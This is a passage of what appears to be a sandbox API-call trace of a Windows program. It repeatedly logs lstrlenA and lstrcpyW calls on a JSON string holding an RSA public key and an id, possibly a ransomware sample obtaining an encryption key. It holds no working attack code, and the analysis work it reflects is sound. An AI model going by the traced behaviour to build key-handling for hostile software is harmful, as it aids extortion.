KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}") returned 542 [0076.256] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT\"}" | out: lpString1="-----BEGIN PUBLIC 